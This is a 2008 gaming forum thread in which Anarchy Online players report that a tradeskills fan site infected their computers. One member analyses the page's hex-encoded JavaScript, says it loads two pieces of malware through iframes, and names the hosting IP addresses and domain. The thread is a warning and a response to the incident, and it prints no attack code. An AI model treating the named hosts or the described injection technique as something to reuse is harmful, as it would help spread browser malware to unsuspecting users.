AOTS Hacked/Infected?!

**ZenWon** · Aug 7th, 2008, 17:03:05

Went to AOTS to find out some armor info at 4am PST immediately got activex control panel which I said no to, at the same time adobe acrobat started running, I hit end program it would not each time I hit end it popped a new window, I shut down lappy n rebooted, when it came back up I was infected with Antivirus XP 2008 which also inserted 4 other EXTREMELY pervasive worms into HD. Trying to remove them burnt up my antivirus as the registry changed each time it detected it so "it wasnt there" each time I tried to heal, running malware designed specifically for this insidious bastard caused four different types of BSOD with tags like "youre******", etc, etc. Finally had to delete entire partion, create a new one and reformat OS from beginning. I would suggest EXTREME CAUTION in using AOTS until someone figures out wtf is going on with it.

**Ruffixx** · Aug 7th, 2008, 17:22:35

As in Cybersheads' AO Tradeskills 2.0?

Odd... used that either earlier in the week or late last week with no issue. Cybs hasn't been active in AO for some time (afaik) and then after putting up the 2nd version of his site I don't know how much he's looked after it so if there really is an issue then I don't know what to say

**ZenWon** · Aug 7th, 2008, 17:28:11

Okie my friend just went there(cause he's hard headed and stupid) to test it Hes running xp 64,(im using xp pro 32) at the regular site nada but as soon as he hit the section I had saved to favorites (perfected alien tank armor) same thing happened adobe acrobat popped, he unlike me was able to end program. Apparentally his firewall stopped it. He's running t-time, me being the cheap bastard I am was using the windows firewall. So if your using windows as default firewall DO NOT GO THERE.

**gergiskoo** · Aug 7th, 2008, 18:00:34

TeaTimer/Spybot-S&D ftw!

**If6was9** · Aug 7th, 2008, 18:11:02

Anarchy Arcanum is back up, for tradeskill info, and there's http://lepetitengi-uk.phoenix-fr.org/index.php? as well for tradeskilling. Good to know about the malware at AOTS.

**Mastablasta** · Aug 7th, 2008, 19:59:06

Originally Posted by gergiskoo

TeaTimer/Spybot-S&D ftw!

That **** is so annoying. Use Noscript for Firefox and you'll never need it again.

**sirmalak** · Aug 8th, 2008, 08:35:26

Injections can be good...injections can be bad.

Kids remember this information during your next doctor visit!

/cheers

/end silly

**ZenWon** · Aug 9th, 2008, 00:56:03

Ok another Orgmate went to AOTS 3 days before- Result ended up also having to delete that partition. (Tx fer lettin me know b4 I went matey LOL)

DO NOT go there unless you have a HELLA good firewall/anti-virus, or just like to melt yer works lol.

**Xyphos** · Aug 9th, 2008, 05:23:17

Okay, I'm not familur with the site you speak of, please PM me the link to it so I can safely examine the page source and work my magic in determining if the site is safe or not.

**Xyphos** · Aug 9th, 2008, 08:59:13

ok, on my first anylisis, I have found some rather funky javascript code - it takes a hex-encoded string, translates it into a string of bytes and writes it to the page via document.write();

I've not yet decoded the strings of machine code yet, but based on what I've found so far, I can tell you that this site is indeed infectious.

STAY AWAY!

**Xyphos** · Aug 9th, 2008, 10:55:54

Second Analysis:

I've fully decoded the javascript.

it's a script that specifically targets and exploits security weakpoints in both Internet Exporer and Mozilla-Based browsers such as Firefox.

anyway, the script translates the hexcoded string into more javascript that loads 2 viruses through IFRAMEs

I've traced the source of the 2 viruses.
1 is from St. Petersburg, Russia - IP Address 77.221.133.171
The server is located
59°89'44" N Latitude
30°26'42" E Longitude

the other virus is from a webdomain "reddii.org" - Registered to a server in Bejing, China. IP Address 220.196.42.213
39°92'89" N Latitude
116°38'83" E Longitude

both servers seem to be sensitive to HTTP header information (Operating System & Browser Type) as I cannot fetch the viruses from my linux system normally

I can however get them via WINE (windows emulation)

no clue what the viruses do exactly, this part is beyond my expertise but given the locations of the servers, I'd say it's how these credit sales / farmers are stealing accounts.

STAY AWAY FROM
AOTRADESKILLS (dot) COM

**schloops** · Aug 9th, 2008, 11:56:33

Oi, interesting.

Are those "generic" virus or homemade ones? I mean, do we have a string we could use to find info about them on the internet?

I went there a couple weeks ago and site kinda crashed.

**ZenWon** · Aug 9th, 2008, 15:13:48

Originally Posted by schloops

Oi, interesting.

Are those "generic" virus or homemade ones? I mean, do we have a string we could use to find info about them on the internet?

I went there a couple weeks ago and site kinda crashed.

Sorry to tell ya mate, but youre probably infected then. One of the main problems I had with these is that as soon as antivirus picked it up, the values would change and it could not be fixed, it would pop up again in another location son after to change yet again once detected. Hence the wipe of partition and HD and reinstallation of my OS and everything else

To xyphos, WTG in being more of a techie than me and pinpointing the nasty, damn j00 linux! (More like damn j00 BILL GATES for giving us such easily exploitable software

) heh

Btw yes, the first one is easily looked up google/eldergeek/etc/etc..its not even a "virus" per se, its listed as very bad malware and GFL getting rid of it (Antivirus XP 2008), but as I said that is the LEAST of the problem at the site, its the worms it installs with that one that will absolutely slay your PC, I was so busy trying to repair/fix/restore/etc that I didnt write all their names down. Update your antivirus/anti-malware/Adaware/SpybotSD/etc and hope it'll pick em up.

At the VERY LEAST I'd suggest changing every single password you've used since going there!!!

**plugszzz** · Aug 9th, 2008, 15:24:08

Got information on the trojan

http://www.paretologic.com/resources...ove=Win32.RBot

Picked up with XoftSpy

**Arlancor** · Aug 9th, 2008, 15:37:54

Thanks for alert!

**wormx** · Aug 9th, 2008, 16:22:10

So um...
That site has always been weird for me, on my old comp (like 6months ago or more) it locked up firefox.

But it seemed to work on this comp... Not sure though what files to look for to see if I did get infected... Gonna try Xoftspy I guess.

I've got my firewall set up to be very strict about traffic, hopefully that helped since I used that site for AI armor a few weeks ago :s

**sirmalak** · Aug 9th, 2008, 16:35:12

Use Linux or use a VM. All other surfing is subject to hell.

**wormx** · Aug 9th, 2008, 16:47:25

Ok, ran a Xoftspy scan and all it found was the usual low risk cookies.
Looks like my firewall/antivirus/luck saved me this time

Might aswell run some more scans, I.e. Ad-aware etc.

**sirmalak** · Aug 9th, 2008, 16:49:12

These kind of javascript easy as pie scripts are so kid-like and we used to play with them in highschool. I cannot believe they are still up and around and going strong like this...scary actually.

Create virii in asm and exploit like a champ or I am not impressed (if anybody associated with the virus is reading this.)

**Omutb** · Aug 9th, 2008, 16:58:18

Originally Posted by Sir_Malak

Create virii in asm and exploit like a champ or I am not impressed (if anybody associated with the virus is reading this.)

Being a "script kiddie" is easy, writing a real virus takes skill.

Even worse, most of the "script" ones are just made using someone elses toolkit to make them, just so sad they cant even do it themselves *sigh*.

Thread: AOTS Hacked/Infected?!

Thread Tools

AOTS Hacked/Infected?!

Posting Permissions